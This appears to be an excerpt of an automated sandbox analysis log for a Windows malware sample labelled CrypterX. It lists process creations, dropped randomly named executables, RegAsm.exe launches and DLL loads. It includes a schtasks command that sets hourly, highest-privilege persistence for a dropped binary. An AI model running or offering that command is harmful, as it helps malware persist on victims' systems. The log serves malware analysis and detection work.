                        Source: C:\Users\user\Documents\iofolko5\hd4YBtMwCrxG4M3aLLza89vv.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                        Source: C:\Users\user\Documents\iofolko5\1IvCzYfqoD3SHvKt45m1rbHu.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                        Source: C:\Users\user\Documents\iofolko5\aFBKY19rLrQU72E14du4WCPo.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6948 -s 876
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeProcess created: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exe "C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exe"
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2796 -ip 2796
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeProcess created: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exe "C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exe"
                        Source: C:\Users\user\Documents\iofolko5\g2v2mVtOHdxh9ZgrtYde5yf0.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1708 -ip 1708
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeProcess created: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exe "C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1708 -s 548
                        Source: C:\Users\user\Documents\iofolko5\wg6F73wLMGz6xXFA14w_olCU.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2796 -s 944
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\jewkkwnf\jewkkwnf.exe" /tn "jewkkwnf HR" /sc HOURLY /rl HIGHEST
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Documents\iofolko5\VkcBn13x2kmdo9AMRXP8qT_4.exeProcess created: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmp "C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmp" /SL5="$30436,2863668,56832,C:\Users\user\Documents\iofolko5\VkcBn13x2kmdo9AMRXP8qT_4.exe"
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                        Source: unknownProcess created: C:\ProgramData\jewkkwnf\jewkkwnf.exe C:\ProgramData\jewkkwnf\jewkkwnf.exe
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\Documents\iofolko5\Yt_9y5LuIpBZXKd9EiYluKkG.exe C:\Users\user\Documents\iofolko5\Yt_9y5LuIpBZXKd9EiYluKkG.exeJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\Documents\iofolko5\kFXFCWzZNovbPAcE4V3M4DAO.exe C:\Users\user\Documents\iofolko5\kFXFCWzZNovbPAcE4V3M4DAO.exeJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\Documents\iofolko5\5Hyf8PuolQS_j4ZkhvHWpkWr.exe C:\Users\user\Documents\iofolko5\5Hyf8PuolQS_j4ZkhvHWpkWr.exeJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\Documents\iofolko5\aFBKY19rLrQU72E14du4WCPo.exe C:\Users\user\Documents\iofolko5\aFBKY19rLrQU72E14du4WCPo.exeJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\Documents\iofolko5\g2v2mVtOHdxh9ZgrtYde5yf0.exe C:\Users\user\Documents\iofolko5\g2v2mVtOHdxh9ZgrtYde5yf0.exeJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exe C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\Documents\iofolko5\wg6F73wLMGz6xXFA14w_olCU.exe C:\Users\user\Documents\iofolko5\wg6F73wLMGz6xXFA14w_olCU.exeJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\Documents\iofolko5\1IvCzYfqoD3SHvKt45m1rbHu.exe C:\Users\user\Documents\iofolko5\1IvCzYfqoD3SHvKt45m1rbHu.exeJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exe C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\Documents\iofolko5\VkcBn13x2kmdo9AMRXP8qT_4.exe C:\Users\user\Documents\iofolko5\VkcBn13x2kmdo9AMRXP8qT_4.exeJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\Documents\iofolko5\hd4YBtMwCrxG4M3aLLza89vv.exe C:\Users\user\Documents\iofolko5\hd4YBtMwCrxG4M3aLLza89vv.exeJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\Documents\iofolko5\iXbjjIcri3rG3XH6GK7dHSLO.exe C:\Users\user\Documents\iofolko5\iXbjjIcri3rG3XH6GK7dHSLO.exeJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\Documents\iofolko5\_U2YDEzm5f5t9soM_Qc1Hc4U.exe C:\Users\user\Documents\iofolko5\_U2YDEzm5f5t9soM_Qc1Hc4U.exeJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\Yt_9y5LuIpBZXKd9EiYluKkG.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                        Source: C:\Users\user\Documents\iofolko5\g2v2mVtOHdxh9ZgrtYde5yf0.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\1IvCzYfqoD3SHvKt45m1rbHu.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeProcess created: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exe "C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exe"Jump to behavior
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeProcess created: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exe "C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exe"Jump to behavior
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeProcess created: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exe "C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exe"Jump to behavior
                        Source: C:\Users\user\Documents\iofolko5\VkcBn13x2kmdo9AMRXP8qT_4.exeProcess created: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmp "C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmp" /SL5="$30436,2863668,56832,C:\Users\user\Documents\iofolko5\VkcBn13x2kmdo9AMRXP8qT_4.exe"
                        Source: C:\Users\user\Documents\iofolko5\hd4YBtMwCrxG4M3aLLza89vv.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                        Source: C:\Users\user\Documents\iofolko5\iXbjjIcri3rG3XH6GK7dHSLO.exeProcess created: unknown unknown
                        Source: C:\Users\user\Documents\iofolko5\_U2YDEzm5f5t9soM_Qc1Hc4U.exeProcess created: unknown unknown
                        Source: C:\Users\user\Documents\iofolko5\_U2YDEzm5f5t9soM_Qc1Hc4U.exeProcess created: unknown unknown
                        Source: C:\Users\user\Documents\iofolko5\_U2YDEzm5f5t9soM_Qc1Hc4U.exeProcess created: unknown unknown
                        Source: C:\Users\user\Documents\iofolko5\_U2YDEzm5f5t9soM_Qc1Hc4U.exeProcess created: unknown unknown
                        Source: C:\Users\user\Documents\iofolko5\_U2YDEzm5f5t9soM_Qc1Hc4U.exeProcess created: unknown unknown
                        Source: C:\Users\user\Documents\iofolko5\_U2YDEzm5f5t9soM_Qc1Hc4U.exeProcess created: unknown unknown
                        Source: C:\Users\user\Documents\iofolko5\_U2YDEzm5f5t9soM_Qc1Hc4U.exeProcess created: unknown unknown
                        Source: C:\Users\user\Documents\iofolko5\_U2YDEzm5f5t9soM_Qc1Hc4U.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 6948 -ip 6948
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6948 -s 876
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2796 -ip 2796
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1708 -ip 1708
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1708 -s 548
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2796 -s 944
                        Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\jewkkwnf\jewkkwnf.exe" /tn "jewkkwnf HR" /sc HOURLY /rl HIGHEST
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeProcess created: unknown unknown
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeProcess created: unknown unknown
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpProcess created: unknown unknown
                        Source: C:\Windows\explorer.exeProcess created: unknown unknown
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\Yt_9y5LuIpBZXKd9EiYluKkG.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\Yt_9y5LuIpBZXKd9EiYluKkG.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\Yt_9y5LuIpBZXKd9EiYluKkG.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\Yt_9y5LuIpBZXKd9EiYluKkG.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\Yt_9y5LuIpBZXKd9EiYluKkG.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\Yt_9y5LuIpBZXKd9EiYluKkG.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\Yt_9y5LuIpBZXKd9EiYluKkG.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\kFXFCWzZNovbPAcE4V3M4DAO.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\kFXFCWzZNovbPAcE4V3M4DAO.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\kFXFCWzZNovbPAcE4V3M4DAO.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\kFXFCWzZNovbPAcE4V3M4DAO.exeSection loaded: webio.dllJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\kFXFCWzZNovbPAcE4V3M4DAO.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\kFXFCWzZNovbPAcE4V3M4DAO.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\kFXFCWzZNovbPAcE4V3M4DAO.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\kFXFCWzZNovbPAcE4V3M4DAO.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\kFXFCWzZNovbPAcE4V3M4DAO.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\kFXFCWzZNovbPAcE4V3M4DAO.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\kFXFCWzZNovbPAcE4V3M4DAO.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\kFXFCWzZNovbPAcE4V3M4DAO.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\kFXFCWzZNovbPAcE4V3M4DAO.exeSection loaded: windowscodecs.dllJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\kFXFCWzZNovbPAcE4V3M4DAO.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\kFXFCWzZNovbPAcE4V3M4DAO.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\kFXFCWzZNovbPAcE4V3M4DAO.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\kFXFCWzZNovbPAcE4V3M4DAO.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\5Hyf8PuolQS_j4ZkhvHWpkWr.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\5Hyf8PuolQS_j4ZkhvHWpkWr.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\5Hyf8PuolQS_j4ZkhvHWpkWr.exeSection loaded: msimg32.dllJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\5Hyf8PuolQS_j4ZkhvHWpkWr.exeSection loaded: msvcr100.dllJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\aFBKY19rLrQU72E14du4WCPo.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\aFBKY19rLrQU72E14du4WCPo.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\aFBKY19rLrQU72E14du4WCPo.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\aFBKY19rLrQU72E14du4WCPo.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\aFBKY19rLrQU72E14du4WCPo.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\aFBKY19rLrQU72E14du4WCPo.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\aFBKY19rLrQU72E14du4WCPo.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\aFBKY19rLrQU72E14du4WCPo.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\g2v2mVtOHdxh9ZgrtYde5yf0.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\g2v2mVtOHdxh9ZgrtYde5yf0.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\g2v2mVtOHdxh9ZgrtYde5yf0.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\g2v2mVtOHdxh9ZgrtYde5yf0.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\g2v2mVtOHdxh9ZgrtYde5yf0.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\g2v2mVtOHdxh9ZgrtYde5yf0.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\g2v2mVtOHdxh9ZgrtYde5yf0.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeSection loaded: k7rn7l32.dllJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeSection loaded: ntd3ll.dllJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\wg6F73wLMGz6xXFA14w_olCU.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\wg6F73wLMGz6xXFA14w_olCU.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\wg6F73wLMGz6xXFA14w_olCU.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\wg6F73wLMGz6xXFA14w_olCU.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\wg6F73wLMGz6xXFA14w_olCU.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\wg6F73wLMGz6xXFA14w_olCU.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\wg6F73wLMGz6xXFA14w_olCU.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\1IvCzYfqoD3SHvKt45m1rbHu.exeSection loaded: mscoree.dllJump to behavior
